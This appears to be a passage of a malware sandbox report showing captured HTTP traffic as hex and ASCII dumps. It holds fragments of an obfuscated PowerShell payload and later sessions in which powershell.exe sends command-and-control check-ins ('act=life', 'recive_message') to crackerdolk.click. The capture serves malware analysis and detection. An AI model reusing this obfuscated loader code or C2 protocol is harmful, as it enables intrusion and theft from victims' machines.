                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 11335646
                                                                                      Connection: close
                                                                                      X-Powered-By: Express
                                                                                      ETag: W/"acf7de-Nz+itdwJjIei1Sg6zL05dqYH1ZM"
                                                                                      Set-Cookie: connect.sid=s%3AeZEpxltijWtx9kd-UsTz-zIDvjVVAJOL.4VDAgwv9GAU6hYZHsLN%2Fin5rsH3XwwFZyy12dxRRHbY; Path=/; HttpOnly
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7YTbv9KojEiiRczugOwATdW1o6yrtx5ysDPLoOOS7UJk2yEbp6vcMARLqgV5glo9Ir4Zn4xeHYECxpN6Ua%2FdbIAHk77MIFnAb%2F%2BcIY5SN7UQWectEXKGOtHcY89EAyQpHvkz4xFj%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f9862fc0a9b0f74-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1550&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=696&delivery_rate=1883870&cwnd=151&unsent_bytes=0&cid=0ec3e37b62a9cfd3&ts=722&x=0"
                                                                                      2024-12-29 08:23:12 UTC378INData Raw: 24 65 62 59 79 33 32 4c 76 62 53 71 6b 37 75 6a 65 4c 48 68 4b 66 54 67 38 46 78 73 58 57 46 33 58 4b 72 78 33 78 63 33 52 51 41 51 6a 58 69 72 30 4e 54 68 66 42 42 75 43 44 72 52 35 34 38 31 6e 6c 52 62 69 4d 39 4d 44 61 37 6d 35 75 4e 49 31 47 64 72 6f 41 44 4d 58 51 69 31 68 55 43 68 70 52 31 65 76 50 6a 49 73 54 6b 34 50 33 37 4c 46 55 61 78 70 65 7a 62 4c 36 36 36 46 77 41 72 4b 36 5a 56 4b 4d 45 6b 71 71 74 72 44 35 32 47 4b 77 56 55 62 30 7a 32 68 7a 71 53 72 79 74 44 6f 48 39 4d 39 41 70 4d 4b 4a 67 4f 33 42 36 37 42 66 68 45 6b 49 6c 61 67 69 74 45 38 4d 78 58 37 52 35 51 46 34 68 52 45 4b 46 65 45 42 6f 6a 75 65 37 43 4a 68 58 61 59 31 68 6b 4b 73 73 6f 41 73 71 79 5a 50 41 71 53 5a 37 57 77 74 7a 39 39 53 35 6c 71 44 30 30 77 49 35 5a 6f 32 45
                                                                                      Data Ascii: $ebYy32LvbSqk7ujeLHhKfTg8FxsXWF3XKrx3xc3RQAQjXir0NThfBBuCDrR5481nlRbiM9MDa7m5uNI1GdroADMXQi1hUChpR1evPjIsTk4P37LFUaxpezbL666FwArK6ZVKMEkqqtrD52GKwVUb0z2hzqSrytDoH9M9ApMKJgO3B67BfhEkIlagitE8MxX7R5QF4hREKFeEBojue7CJhXaY1hkKssoAsqyZPAqSZ7Wwtz99S5lqD00wI5Zo2E
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 49 71 30 31 6c 34 32 6e 4d 73 42 70 33 63 62 49 64 61 56 6c 37 47 49 33 79 4e 77 4f 57 47 70 75 4d 70 77 72 6d 52 43 4d 5a 50 53 37 39 54 4c 69 57 57 4e 6f 46 4f 6d 74 53 6a 46 4e 49 49 4e 6d 67 66 72 6d 4b 44 43 37 5a 48 6d 5a 35 54 65 45 54 53 74 7a 39 64 41 69 42 45 66 58 41 32 61 59 66 6f 36 72 4b 44 34 46 75 61 4f 7a 68 78 44 6b 42 43 50 37 4c 74 5a 65 76 69 63 43 53 54 5a 4d 41 41 6e 58 6e 45 62 78 56 7a 69 35 77 39 4e 52 4f 38 50 4e 66 32 39 31 7a 6d 56 64 39 78 48 37 45 6b 67 47 38 7a 72 46 58 4c 50 61 32 49 42 37 70 53 44 4e 6e 4e 71 50 64 68 4e 35 68 4f 46 59 48 47 45 38 55 62 71 5a 20 3d 20 22 47 65 74 22 0d 0a 0d 0a 24 59 4f 76 38 56 35 75 42 62 63 4e 50 30 70 64 6d 31 72 51 6a 4d 5a 37 65 71 67 4b 75 69 65 71 20 3d 20 22 42 60 79 74 65 22 0d
                                                                                      Data Ascii: Iq01l42nMsBp3cbIdaVl7GI3yNwOWGpuMpwrmRCMZPS79TLiWWNoFOmtSjFNIINmgfrmKDC7ZHmZ5TeETStz9dAiBEfXA2aYfo6rKD4FuaOzhxDkBCP7LtZevicCSTZMAAnXnEbxVzi5w9NRO8PNf291zmVd9xH7EkgG8zrFXLPa2IB7pSDNnNqPdhN5hOFYHGE8UbqZ = "Get"$YOv8V5uBbcNP0pdm1rQjMZ7eqgKuieq = "B`yte"
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 32 48 33 63 32 54 50 55 46 67 4b 35 4a 30 46 38 4b 59 77 34 73 6d 58 38 71 37 31 43 4d 54 38 32 67 66 39 50 6b 49 4d 4c 58 76 73 6c 66 48 46 66 73 44 43 57 52 33 75 76 30 50 54 58 67 54 71 76 63 64 37 56 63 57 64 6a 37 55 30 5a 7a 4e 72 79 6f 41 45 41 56 20 3d 20 28 24 65 62 59 79 33 32 4c 76 62 53 71 6b 37 75 6a 65 4c 48 68 4b 66 54 67 38 46 78 73 58 57 46 33 58 4b 72 78 33 78 63 33 52 51 41 51 6a 58 69 72 30 4e 54 68 66 42 42 75 43 44 72 52 35 34 38 31 6e 6c 52 62 69 4d 39 4d 44 61 37 6d 35 75 4e 49 31 47 64 72 6f 41 44 4d 58 51 69 31 68 55 43 68 70 52 31 65 76 50 6a 49 73 54 6b 34 50 33 37 4c 46 55 61 78 70 65 7a 62 4c 36 36 36 46 77 41 72 4b 36 5a 56 4b 4d 45 6b 71 71 74 72 44 35 32 47 4b 77 56 55 62 30 7a 32 68 7a 71 53 72 79 74 44 6f 48 39 4d 39 41
                                                                                      Data Ascii: 2H3c2TPUFgK5J0F8KYw4smX8q71CMT82gf9PkIMLXvslfHFfsDCWR3uv0PTXgTqvcd7VcWdj7U0ZzNryoAEAV = ($ebYy32LvbSqk7ujeLHhKfTg8FxsXWF3XKrx3xc3RQAQjXir0NThfBBuCDrR5481nlRbiM9MDa7m5uNI1GdroADMXQi1hUChpR1evPjIsTk4P37LFUaxpezbL666FwArK6ZVKMEkqqtrD52GKwVUb0z2hzqSrytDoH9M9A
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 57 77 37 6a 38 4c 55 46 4a 4d 7a 54 47 31 55 77 43 65 7a 46 6a 39 66 72 4f 6e 74 72 54 66 42 34 35 69 42 38 6c 4b 46 33 4e 39 32 59 5a 39 33 6f 39 6d 75 76 73 57 4f 45 36 6d 71 4c 34 4d 4a 49 41 38 44 47 5a 67 69 47 6d 36 4d 44 33 57 47 66 53 61 4a 4a 75 43 50 4d 46 4b 4b 63 6c 38 70 6e 6e 61 43 39 64 72 73 72 4f 71 4b 72 78 78 34 6e 57 6e 53 39 4c 58 79 32 44 67 76 35 6d 59 43 45 6d 4e 49 70 31 64 32 78 48 66 36 36 41 72 36 6b 34 72 7a 6d 33 6f 44 76 6e 46 39 32 48 4b 4d 51 69 59 30 76 37 46 4e 33 76 78 4f 72 62 43 38 72 6c 66 65 56 50 6d 77 51 38 54 57 33 52 78 53 66 77 66 77 49 65 43 73 6a 6f 4e 30 52 65 7a 75 7a 31 4f 6d 7a 49 75 63 6f 64 61 67 66 39 4f 46 61 57 70 39 50 61 70 74 53 41 49 6d 76 53 65 4d 46 53 47 75 6c 42 4e 68 49 78 75 59 74 56 32 6f
                                                                                      Data Ascii: Ww7j8LUFJMzTG1UwCezFj9frOntrTfB45iB8lKF3N92YZ93o9muvsWOE6mqL4MJIA8DGZgiGm6MD3WGfSaJJuCPMFKKcl8pnnaC9drsrOqKrxx4nWnS9LXy2Dgv5mYCEmNIp1d2xHf66Ar6k4rzm3oDvnF92HKMQiY0v7FN3vxOrbC8rlfeVPmwQ8TW3RxSfwfwIeCsjoN0Rezuz1OmzIucodagf9OFaWp9PaptSAImvSeMFSGulBNhIxuYtV2o
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 2d 31 33 2a 31 38 29 29 29 2d 28 34 37 36 30 33 29 29 29 20 0d 0a 7b 0d 0a 24 61 4a 76 63 55 54 52 48 52 70 65 20 3d 20 39 31 34 0d 0a 24 59 6a 4b 50 6d 54 6c 51 20 3d 20 24 6d 78 4b 42 63 6c 76 79 53 70 57 0d 0a 7d 0d 0a 28 28 28 24 72 53 42 51 6e 73 6c 4b 6f 66 2d 33 2d 28 24 70 57 4d 74 73 43 76 73 2d 33 39 2d 24 51 75 76 4d 4c 78 4b 69 48 43 54 29 2d 28 28 32 32 2b 34 33 2d 31 31 29 29 29 29 29 20 0d 0a 7b 0d 0a 24 43 7a 69 78 54 52 72 79 58 57 4b 64 6d 75 20 3d 20 31 34 30 0d 0a 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 20 3d 20 24 76 68 78 71 55 79 59 63 0d 0a 7d 0d 0a 64 65 66 61 75 6c 74 20 7b 28 28 28 28 33 36 2b 31 2b 33 32 29 29 29 2a 32 31 2b 31 36 2d 28 38 2a 31 36 2b 34 31 29 2d 28 28 33 39 2d 31 31 2a 33 30 29 29 2d 28 31 35 37 39 29 29 7d
                                                                                      Data Ascii: -13*18)))-(47603))) {$aJvcUTRHRpe = 914$YjKPmTlQ = $mxKBclvySpW}((($rSBQnslKof-3-($pWMtsCvs-39-$QuvMLxKiHCT)-((22+43-11))))) {$CzixTRryXWKdmu = 140$werDTikakmbJr = $vhxqUyYc}default {((((36+1+32)))*21+16-(8*16+41)-((39-11*30))-(1579))}
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 37 2d 31 32 2d 32 39 2d 28 31 35 39 35 29 29 0d 0a 24 50 59 6d 54 75 72 63 58 20 3d 20 28 28 28 28 33 33 2d 36 2b 28 24 6a 72 4f 67 46 55 56 49 64 2b 34 38 2b 24 59 73 4f 70 4b 57 76 7a 52 29 2b 24 54 58 70 4b 6b 75 6c 66 4f 4e 7a 2d 38 2d 33 38 29 29 29 2d 28 33 30 31 29 29 0d 0a 24 6a 62 69 41 57 63 4c 4d 78 4f 49 68 4a 4f 20 3d 20 28 28 35 2d 36 2b 24 6f 72 6a 4d 70 65 4e 2b 28 24 77 47 6c 7a 75 2b 36 2b 28 24 4e 4d 45 47 52 4f 2b 32 39 2b 39 29 29 29 2d 28 34 37 32 29 29 0d 0a 24 62 67 79 52 64 56 4d 74 49 73 65 4b 20 3d 20 28 28 28 28 24 75 68 58 66 59 2d 31 2b 24 54 58 70 4b 6b 75 6c 66 4f 4e 7a 29 29 2b 28 28 35 2b 34 2d 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 29 29 29 2d 28 34 30 2d 33 33 2d 31 29 2d 28 32 35 29 29 0d 0a 24 73 47 45 52 79 74 50
                                                                                      Data Ascii: 7-12-29-(1595))$PYmTurcX = ((((33-6+($jrOgFUVId+48+$YsOpKWvzR)+$TXpKkulfONz-8-38)))-(301))$jbiAWcLMxOIhJO = ((5-6+$orjMpeN+($wGlzu+6+($NMEGRO+29+9)))-(472))$bgyRdVMtIseK = (((($uhXfY-1+$TXpKkulfONz))+((5+4-$LbCtZLCSWvRSw)))-(40-33-1)-(25))$sGERytP
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 4e 72 72 29 29 2b 28 24 76 68 78 71 55 79 59 63 2d 33 32 2d 31 38 29 2b 28 28 24 45 53 4b 57 51 6c 4e 6b 56 75 2b 33 2d 33 33 29 29 2d 28 37 31 35 29 29 0d 0a 24 47 6f 78 51 4b 57 67 6e 75 4c 6d 20 3d 20 28 28 28 24 5a 79 71 47 47 2d 34 35 2d 33 30 2b 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 2d 33 35 2d 28 24 42 78 4c 47 45 74 53 4f 59 2d 32 2d 24 71 41 73 6e 76 50 62 50 6a 57 75 73 46 2d 28 28 31 36 2d 34 34 2b 24 48 50 41 73 62 67 79 5a 58 64 59 42 76 29 29 2d 34 34 2b 34 38 2b 34 36 29 29 29 2d 28 31 33 39 29 29 0d 0a 24 4b 70 4f 6b 58 44 45 53 72 62 7a 66 73 4a 20 3d 20 28 28 28 31 36 2b 32 35 2b 34 36 29 29 2d 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 2b 32 39 2b 32 2b 28 34 31 2b 32 39 2d 28 24 72 7a 74 47 4b 63 41 70 49 73 79 2b 33 33 2d 34 35 29
                                                                                      Data Ascii: Nrr))+($vhxqUyYc-32-18)+(($ESKWQlNkVu+3-33))-(715))$GoxQKWgnuLm = ((($ZyqGG-45-30+$werDTikakmbJr-35-($BxLGEtSOY-2-$qAsnvPbPjWusF-((16-44+$HPAsbgyZXdYBv))-44+48+46)))-(139))$KpOkXDESrbzfsJ = (((16+25+46))-$LbCtZLCSWvRSw+29+2+(41+29-($rztGKcApIsy+33-45)
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 72 53 42 51 6e 73 6c 4b 6f 66 2b 34 2b 28 32 38 2b 34 32 2b 33 34 29 2d 28 33 35 37 29 29 0d 0a 24 45 6c 6f 6a 4e 6d 59 43 70 20 3d 20 28 28 28 24 5a 74 76 6d 6c 2d 33 37 2d 28 24 48 43 53 70 52 66 77 4b 41 41 2d 33 35 2b 24 72 7a 74 47 4b 63 41 70 49 73 79 29 2b 31 36 2b 31 38 2d 24 75 68 58 66 59 29 2b 28 32 36 2d 32 33 2d 24 6b 57 47 68 4f 54 55 7a 58 4e 53 65 68 51 29 2b 28 28 32 38 2d 31 32 2d 33 35 29 29 29 2b 28 37 32 36 29 29 0d 0a 24 74 6d 41 7a 55 59 75 72 4b 78 20 3d 20 28 28 33 39 2b 37 2d 31 29 2b 28 24 6b 58 7a 74 51 52 41 2b 31 33 2d 28 24 6b 68 63 4e 65 4c 78 2b 33 2b 24 6b 57 47 68 4f 54 55 7a 58 4e 53 65 68 51 2b 24 64 74 57 45 48 47 4f 77 69 6e 2b 34 2b 31 37 29 29 2b 28 36 38 34 29 29 0d 0a 24 41 4e 65 43 66 4d 4a 49 79 4a 6f 4d 56 20
                                                                                      Data Ascii: rSBQnslKof+4+(28+42+34)-(357))$ElojNmYCp = ((($Ztvml-37-($HCSpRfwKAA-35+$rztGKcApIsy)+16+18-$uhXfY)+(26-23-$kWGhOTUzXNSehQ)+((28-12-35)))+(726))$tmAzUYurKx = ((39+7-1)+($kXztQRA+13-($khcNeLx+3+$kWGhOTUzXNSehQ+$dtWEHGOwin+4+17))+(684))$ANeCfMJIyJoMV
                                                                                      2024-12-29 08:23:12 UTC1369INData Raw: 65 6a 57 63 74 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 57 6e 44 69 52 4c 72 61 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6c 6d 6c 6e 6b 71 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 48 59 70 47 4c 45 66 4b 62 42 52 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 45 6c 6f 6a 4e 6d 59 43 70 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 74 6d 41 7a 55 59 75 72 4b 78 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 41 4e 65 43 66 4d 4a 49 79 4a 6f 4d 56 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 64 71 6d 4b 5a 46 53 74 53 58 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 59 62 54 76 53 55 6a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6a 4a 65 54 51 50 53 6c 4d 4b 29 0d 0a 0d 0a 24 4c 74 68 4e 73 4b 72 65 75 78 42 20 3d 20 38 36 0d 0a 24 54 74 6a 70 6d 44
                                                                                      Data Ascii: ejWct + [char][int]$WnDiRLra + [char][int]$lmlnkq + [char][int]$HYpGLEfKbBR + [char][int]$ElojNmYCp + [char][int]$tmAzUYurKx + [char][int]$ANeCfMJIyJoMV + [char][int]$dqmKZFStSX + [char][int]$YbTvSUj + [char][int]$jJeTQPSlMK)$LthNsKreuxB = 86$TtjpmD
                                                                                      2024-12-29 08:23:12 UTC1185INData Raw: 57 4d 74 73 43 76 73 2d 33 39 2d 24 51 75 76 4d 4c 78 4b 69 48 43 54 29 2d 28 28 32 32 2b 34 33 2d 31 31 29 29 29 29 29 20 0d 0a 7b 0d 0a 24 43 7a 69 78 54 52 72 79 58 57 4b 64 6d 75 20 3d 20 31 34 30 0d 0a 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 20 3d 20 24 76 68 78 71 55 79 59 63 0d 0a 7d 0d 0a 64 65 66 61 75 6c 74 20 7b 28 28 28 28 33 36 2b 31 2b 33 32 29 29 29 2a 32 31 2b 31 36 2d 28 38 2a 31 36 2b 34 31 29 2d 28 28 33 39 2d 31 31 2a 33 30 29 29 2d 28 31 35 37 39 29 29 7d 0d 0a 7d 24 5a 74 76 6d 6c 20 3d 20 34 35 31 0d 0a 24 74 4b 68 72 6e 52 43 70 78 20 3d 20 28 28 28 33 38 2b 34 35 2b 34 34 2d 28 28 31 2d 32 32 2a 32 36 2b 28 34 32 2d 33 35 2b 31 36 29 29 29 29 2d 28 36 35 31 29 29 29 0d 0a 24 64 74 57 45 48 47 4f 77 69 6e 20 3d 20 28 28 28 33 2b
                                                                                      Data Ascii: WMtsCvs-39-$QuvMLxKiHCT)-((22+43-11))))) {$CzixTRryXWKdmu = 140$werDTikakmbJr = $vhxqUyYc}default {((((36+1+32)))*21+16-(8*16+41)-((39-11*30))-(1579))}}$Ztvml = 451$tKhrnRCpx = (((38+45+44-((1-22*26+(42-35+16))))-(651)))$dtWEHGOwin = (((3+


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549931104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:06 UTC264OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2024-12-29 08:25:07 UTC1131INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:06 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=1gh0ljom36ji6bves5kj75o8s5; expires=Thu, 24 Apr 2025 02:11:45 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyCD21SQWNiKvgMZrksVxf1UrYpFRUhe9SlohcsU83DLaqU6B7Abe77rdgUwMU7OtTSqt1qFzludAIqIBxqHdxB3pmoVjL%2FpDi%2BH3NKh8awQ%2FvBbS8Tlxg2rmyZ4Njsecz%2BgQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f9865c7f83843e9-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1638&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=908&delivery_rate=1712609&cwnd=242&unsent_bytes=0&cid=44f92d1718e006ae&ts=863&x=0"
                                                                                      2024-12-29 08:25:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 2ok
                                                                                      2024-12-29 08:25:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549936104.21.80.14437448C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:25:08 UTC265OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 78
                                                                                      Host: crackerdolk.click
                                                                                      2024-12-29 08:25:08 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--bigJ&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                      2024-12-29 08:25:10 UTC1132INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:25:10 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=odbvgvufesd2uhilvi4fonbnk0; expires=Thu, 24 Apr 2025 02:11:49 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2YW2t68oFOZA8JArepf5WdDNBnFfzAnt7VNSvN1P9HzOq169dAJw%2FfQMI17%2B9kpHhbwTIkF4YYgbAUydohKe%2Fa3mD2buyCxy%2FXNZISmaqzrdELhrbD2VtSfJyLv1Ww0hWSADiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f9865d5ac9dc443-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1617&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=979&delivery_rate=1688837&cwnd=244&unsent_bytes=0&cid=37b6ba82b020ea6e&ts=1942&x=0"
                                                                                      2024-12-29 08:25:10 UTC237INData Raw: 31 63 61 33 0d 0a 6b 2b 63 64 49 72 53 54 72 76 79 54 31 42 49 77 77 46 49 6c 36 70 2b 5a 65 51 55 57 66 39 62 76 69 30 52 33 38 55 6b 68 6d 31 37 6f 78 57 73 41 6a 71 65 43 33 75 43 78 4d 41 71 6d 4d 30 6d 5a 2b 72 56 62 5a 48 4a 64 37 49 6e 71 4b 41 53 55 5a 51 50 74 4d 37 48 64 65 30 50 59 34 4d 76 51 73 62 46 71 45 76 6f 4a 58 73 6a 36 39 31 73 2f 4e 42 71 38 6a 65 6f 6f 46 5a 41 69 54 75 73 79 38 49 39 78 52 64 7a 32 7a 5a 6a 79 75 48 39 56 70 54 64 45 67 50 48 77 46 47 31 37 58 66 72 4e 37 6a 35 56 79 32 74 73 2f 69 72 79 71 6e 78 52 33 37 48 54 30 4f 6a 32 64 31 37 69 61 41 65 4c 2b 76 73 56 59 33 49 55 76 6f 66 6a 49 42 53 56 49 31 48 79 4f 50 75 50 66 30 62 64 2f 4d 53 4d 2f 37 4a 34 58 71 4d
                                                                                      Data Ascii: 1ca3k+cdIrSTrvyT1BIwwFIl6p+ZeQUWf9bvi0R38Ukhm17oxWsAjqeC3uCxMAqmM0mZ+rVbZHJd7InqKASUZQPtM7Hde0PY4MvQsbFqEvoJXsj691s/NBq8jeooFZAiTusy8I9xRdz2zZjyuH9VpTdEgPHwFG17XfrN7j5Vy2ts/iryqnxR37HT0Oj2d17iaAeL+vsVY3IUvofjIBSVI1HyOPuPf0bd/MSM/7J4XqM
                                                                                      2024-12-29 08:25:10 UTC1369INData Raw: 39 52 4d 69 7a 75 78 78 2f 4e 45 58 30 33 74 73 6c 42 49 49 2b 54 75 6b 36 73 5a 6f 78 57 5a 62 32 77 4e 36 70 39 6e 68 65 72 44 56 45 68 2f 72 36 47 33 56 37 48 62 65 46 34 53 49 66 6e 43 52 4d 39 7a 62 32 6a 58 5a 48 32 66 62 45 6d 50 36 31 4d 42 7a 69 4e 31 2f 49 70 62 73 37 64 33 63 65 6f 49 44 34 5a 67 72 64 4d 67 50 2b 4d 4c 48 64 50 30 62 59 38 4d 47 65 34 37 35 37 57 61 63 69 54 49 48 77 39 68 74 71 66 68 4b 33 6a 65 34 73 48 35 77 68 52 2f 51 78 39 34 56 2f 41 4a 69 78 79 34 61 78 37 6a 42 78 70 79 42 41 68 4f 75 35 49 53 64 72 55 36 33 4e 37 69 70 56 79 32 74 4c 2f 44 2f 79 6a 6e 42 44 33 76 72 65 6e 75 4f 77 66 56 65 77 4e 6b 4b 47 39 2f 67 4a 62 58 6f 62 74 34 54 69 4c 78 43 55 4c 77 4f 33 66 50 61 64 50 78 69 57 30 4d 47 56 2f 62 78 6e 55 75
                                                                                      Data Ascii: 9RMizuxx/NEX03tslBII+Tuk6sZoxWZb2wN6p9nherDVEh/r6G3V7HbeF4SIfnCRM9zb2jXZH2fbEmP61MBziN1/Ipbs7d3ceoID4ZgrdMgP+MLHdP0bY8MGe4757WaciTIHw9htqfhK3je4sH5whR/Qx94V/AJixy4ax7jBxpyBAhOu5ISdrU63N7ipVy2tL/D/yjnBD3vrenuOwfVewNkKG9/gJbXobt4TiLxCULwO3fPadPxiW0MGV/bxnUu
                                                                                      2024-12-29 08:25:10 UTC1369INData Raw: 2f 66 63 4a 61 33 34 62 75 34 44 6c 5a 6c 76 54 4c 46 75 35 5a 4c 47 76 66 46 54 56 2b 34 36 72 38 72 68 2b 56 62 52 77 57 4d 62 6b 75 78 78 72 4e 45 58 30 67 4f 67 75 45 34 45 6b 54 76 6f 79 2f 34 70 36 54 39 37 78 7a 4a 50 30 73 6e 74 5a 6f 54 31 44 6d 76 66 37 45 32 4a 31 46 37 37 4e 70 32 59 53 69 32 73 62 75 51 33 6d 6a 6a 31 31 31 66 2f 43 6d 65 66 32 62 78 79 37 63 45 43 45 76 61 4e 62 61 6e 77 59 73 59 4c 6f 4c 42 75 57 49 55 2f 78 4d 76 4b 58 63 45 54 57 2f 63 53 55 2f 4c 68 30 57 71 73 37 54 49 37 39 2b 68 45 6e 4f 6c 32 7a 6c 61 6c 2b 56 61 63 73 54 2f 51 7a 73 37 42 38 54 74 6a 32 32 74 37 75 2b 47 6b 53 70 54 77 48 30 4c 33 33 45 6d 64 2f 46 37 43 4e 37 69 73 51 6b 43 78 41 39 44 76 37 69 33 68 45 32 76 6a 42 6d 50 47 78 64 46 65 77 4e 55 36
                                                                                      Data Ascii: /fcJa34bu4DlZlvTLFu5ZLGvfFTV+46r8rh+VbRwWMbkuxxrNEX0gOguE4EkTvoy/4p6T97xzJP0sntZoT1Dmvf7E2J1F77Np2YSi2sbuQ3mjj111f/Cmef2bxy7cECEvaNbanwYsYLoLBuWIU/xMvKXcETW/cSU/Lh0Wqs7TI79+hEnOl2zlal+VacsT/Qzs7B8Ttj22t7u+GkSpTwH0L33Emd/F7CN7isQkCxA9Dv7i3hE2vjBmPGxdFewNU6
                                                                                      2024-12-29 08:25:10 UTC1369INData Raw: 6d 6c 69 58 61 76 44 38 47 59 53 6e 32 73 62 75 54 58 34 6c 33 46 4f 33 2f 7a 4b 6c 76 61 34 66 56 6d 6b 4f 30 43 50 2b 2f 59 54 61 6e 45 65 74 59 6e 6a 4e 42 61 59 49 55 37 7a 66 4c 2f 46 65 46 69 57 71 59 79 35 2f 5a 39 67 53 62 41 6d 42 35 65 7a 34 6c 74 67 65 46 33 73 7a 65 6f 70 48 4a 77 6a 53 2f 59 7a 39 59 74 35 52 74 76 30 77 35 54 6a 76 6e 35 66 71 54 39 4d 6d 76 33 32 48 32 74 77 46 62 2b 48 71 57 68 56 6c 44 4d 44 6f 58 7a 45 69 48 42 41 31 65 65 4d 67 62 2b 76 4d 46 57 75 63 42 2f 49 38 66 55 62 61 48 67 52 76 34 58 6f 4b 68 75 55 4c 6b 72 78 4e 4f 4f 45 65 30 6a 58 2f 38 4f 66 39 62 4e 31 56 71 55 30 51 59 65 39 74 56 74 67 62 46 33 73 7a 63 59 42 49 4e 45 4b 65 62 6b 6a 76 35 77 2f 52 39 71 78 6c 4e 37 39 74 58 78 61 72 54 5a 4f 68 50 66 79
